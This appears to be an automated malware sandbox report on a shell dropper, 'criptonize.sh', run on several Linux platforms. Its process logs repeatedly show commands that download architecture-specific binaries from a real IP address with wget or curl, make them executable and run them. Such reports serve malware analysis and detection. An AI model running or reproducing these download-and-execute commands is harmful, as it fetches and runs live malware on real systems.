| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/bin/rm
[rm -f criptonize.x86_64]
/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/bin/rm
[rm -f criptonize.i686]
/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/bin/rm
[rm -f criptonize.i586]
/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/bin/rm
[rm -f criptonize.i486]
/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/bin/rm
[rm -f criptonize.aarch64]
/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/bin/rm
[rm -f criptonize.armv7l]
/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/bin/rm
[rm -f criptonize.armv6l]
/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/bin/rm
[rm -f criptonize.armv5l]
/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/bin/rm
[rm -f criptonize.armv4eb]
/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/bin/rm
[rm -f criptonize.armv4tl]
/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/bin/rm
[rm -f criptonize.armv4l]
/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/bin/rm
[rm -f criptonize.mips64]
/bin/rm
[rm -f criptonize.mips]
/usr/bin/wget
[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]
/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/bin/rm
[rm -f criptonize.mips]
/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/wget
[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
Network
| Country | Destination | Domain | Proto |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | tcp |
Files
memory/712-1-0xb672a000-0xb673b044-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
debian9-mipsbe-20240611-en
Max time kernel
30s
Max time network
33s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/bin/rm
[rm -f criptonize.x86_64]
/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/bin/rm
[rm -f criptonize.i686]
/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/bin/rm
[rm -f criptonize.i586]
/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/bin/rm
[rm -f criptonize.i486]
/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/bin/rm
[rm -f criptonize.aarch64]
/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/bin/rm
[rm -f criptonize.armv7l]
/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
Network
| Country | Destination | Domain | Proto |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
28s
Max time network
33s
Command Line
Signatures
Writes memory of remote process
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/criptonize.i686 | N/A |
| N/A | N/A | /tmp/criptonize.i586 | N/A |
Loads a kernel module
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/criptonize.i686 | N/A |
| N/A | N/A | /tmp/criptonize.i586 | N/A |
| N/A | N/A | /tmp/criptonize.i486 | N/A |
| N/A | N/A | /tmp/criptonize.i486 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.arc700 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.bsdamd64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.sparc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.powerpc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/wget | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/wget | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/wget
[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/usr/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/wget
[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]
/usr/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/wget
[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]
/usr/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/wget
[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]
/usr/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/wget
[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/usr/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/wget
[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/usr/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/wget
[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/usr/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/wget
[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/usr/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/wget
[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/usr/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/wget
[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/usr/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/wget
[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/usr/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/wget
[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/usr/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/wget
[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]
/usr/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/wget
[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
/usr/bin/chmod
[chmod 777 criptonize.mipsel]
/tmp/criptonize.mipsel
[./criptonize.mipsel mipsel]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/wget
[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]
/usr/bin/chmod
[chmod 777 criptonize.powerpc]
/tmp/criptonize.powerpc
[./criptonize.powerpc powerpc]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/wget
[wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k]
/usr/bin/chmod
[chmod 777 criptonize.m68k]
/tmp/criptonize.m68k
[./criptonize.m68k m68k]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/wget
[wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4]
/usr/bin/chmod
[chmod 777 criptonize.sh4]
/tmp/criptonize.sh4
[./criptonize.sh4 sh4]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/rm
[rm -f criptonize.sparc]
/usr/bin/wget
[wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc]
/usr/bin/chmod
[chmod 777 criptonize.sparc]
/tmp/criptonize.sparc
[./criptonize.sparc sparc]
/usr/bin/rm
[rm -f criptonize.sparc]
/usr/bin/rm
[rm -f criptonize.arc700]
/usr/bin/wget
[wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700]
/usr/bin/chmod
[chmod 777 criptonize.arc700]
/tmp/criptonize.arc700
[./criptonize.arc700 arc700]
/usr/bin/rm
[rm -f criptonize.arc700]
/usr/bin/rm
[rm -f criptonize.bsdamd64]
/usr/bin/wget
[wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:47
Platform
debian12-armhf-20240729-en
Max time kernel
29s
Max time network
31s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/criptonize.mipsel | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv7l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv5l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv4l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.mips64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.i586 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv6l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv4tl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.i486 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.aarch64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.armv4eb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.powerpc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/criptonize.m68k | /usr/bin/curl | N/A |
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/curl
[curl -o criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]
/usr/bin/chmod
[chmod 777 criptonize.x86_64]
/tmp/criptonize.x86_64
[./criptonize.x86_64 x86_64]
/usr/bin/rm
[rm -f criptonize.x86_64]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/curl
[curl -o criptonize.i686 http://212.60.5.174/criptonize.i686]
/usr/bin/chmod
[chmod 777 criptonize.i686]
/tmp/criptonize.i686
[./criptonize.i686 i686]
/usr/bin/rm
[rm -f criptonize.i686]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/curl
[curl -o criptonize.i586 http://212.60.5.174/criptonize.i586]
/usr/bin/chmod
[chmod 777 criptonize.i586]
/tmp/criptonize.i586
[./criptonize.i586 i586]
/usr/bin/rm
[rm -f criptonize.i586]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/curl
[curl -o criptonize.i486 http://212.60.5.174/criptonize.i486]
/usr/bin/chmod
[chmod 777 criptonize.i486]
/tmp/criptonize.i486
[./criptonize.i486 i486]
/usr/bin/rm
[rm -f criptonize.i486]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/curl
[curl -o criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]
/usr/bin/chmod
[chmod 777 criptonize.aarch64]
/tmp/criptonize.aarch64
[./criptonize.aarch64 aarch64]
/usr/bin/rm
[rm -f criptonize.aarch64]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/curl
[curl -o criptonize.armv7l http://212.60.5.174/criptonize.armv7l]
/usr/bin/chmod
[chmod 777 criptonize.armv7l]
/tmp/criptonize.armv7l
[./criptonize.armv7l armv7l]
/usr/bin/rm
[rm -f criptonize.armv7l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/curl
[curl -o criptonize.armv6l http://212.60.5.174/criptonize.armv6l]
/usr/bin/chmod
[chmod 777 criptonize.armv6l]
/tmp/criptonize.armv6l
[./criptonize.armv6l armv6l]
/usr/bin/rm
[rm -f criptonize.armv6l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/curl
[curl -o criptonize.armv5l http://212.60.5.174/criptonize.armv5l]
/usr/bin/chmod
[chmod 777 criptonize.armv5l]
/tmp/criptonize.armv5l
[./criptonize.armv5l armv5l]
/usr/bin/rm
[rm -f criptonize.armv5l]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/curl
[curl -o criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]
/usr/bin/chmod
[chmod 777 criptonize.armv4eb]
/tmp/criptonize.armv4eb
[./criptonize.armv4eb armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4eb]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/curl
[curl -o criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]
/usr/bin/chmod
[chmod 777 criptonize.armv4tl]
/tmp/criptonize.armv4tl
[./criptonize.armv4tl armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4tl]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/curl
[curl -o criptonize.armv4l http://212.60.5.174/criptonize.armv4l]
/usr/bin/chmod
[chmod 777 criptonize.armv4l]
/tmp/criptonize.armv4l
[./criptonize.armv4l armv4l]
/usr/bin/rm
[rm -f criptonize.armv4l]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/curl
[curl -o criptonize.mips64 http://212.60.5.174/criptonize.mips64]
/usr/bin/chmod
[chmod 777 criptonize.mips64]
/tmp/criptonize.mips64
[./criptonize.mips64 mips64]
/usr/bin/rm
[rm -f criptonize.mips64]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/curl
[curl -o criptonize.mips http://212.60.5.174/criptonize.mips]
/usr/bin/chmod
[chmod 777 criptonize.mips]
/tmp/criptonize.mips
[./criptonize.mips mips]
/usr/bin/rm
[rm -f criptonize.mips]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/curl
[curl -o criptonize.mipsel http://212.60.5.174/criptonize.mipsel]
/usr/bin/chmod
[chmod 777 criptonize.mipsel]
/tmp/criptonize.mipsel
[./criptonize.mipsel mipsel]
/usr/bin/rm
[rm -f criptonize.mipsel]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/curl
[curl -o criptonize.powerpc http://212.60.5.174/criptonize.powerpc]
/usr/bin/chmod
[chmod 777 criptonize.powerpc]
/tmp/criptonize.powerpc
[./criptonize.powerpc powerpc]
/usr/bin/rm
[rm -f criptonize.powerpc]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/curl
[curl -o criptonize.m68k http://212.60.5.174/criptonize.m68k]
/usr/bin/chmod
[chmod 777 criptonize.m68k]
/tmp/criptonize.m68k
[./criptonize.m68k m68k]
/usr/bin/rm
[rm -f criptonize.m68k]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/curl
[curl -o criptonize.sh4 http://212.60.5.174/criptonize.sh4]
/usr/bin/chmod
[chmod 777 criptonize.sh4]
/tmp/criptonize.sh4
[./criptonize.sh4 sh4]
/usr/bin/rm
[rm -f criptonize.sh4]
/usr/bin/rm
[rm -f criptonize.sparc]
/usr/bin/curl
[curl -o criptonize.sparc http://212.60.5.174/criptonize.sparc]
Network
| Country | Destination | Domain | Proto |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240729-en-10 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240729-en-10 | udp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240729-en-10 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240729-en-10 | udp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
| RU | 212.60.5.174:80 | 212.60.5.174 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-27 23:47
Reported
2024-08-27 23:57
Platform
debian12-mipsel-20240418-en
Max time kernel
0s
Max time network
13s
Command Line
Signatures
Processes
/tmp/criptonize.sh
[/tmp/criptonize.sh]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian12-mipsel-20240418-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240418-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240418-en-14 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240418-en-14 | udp |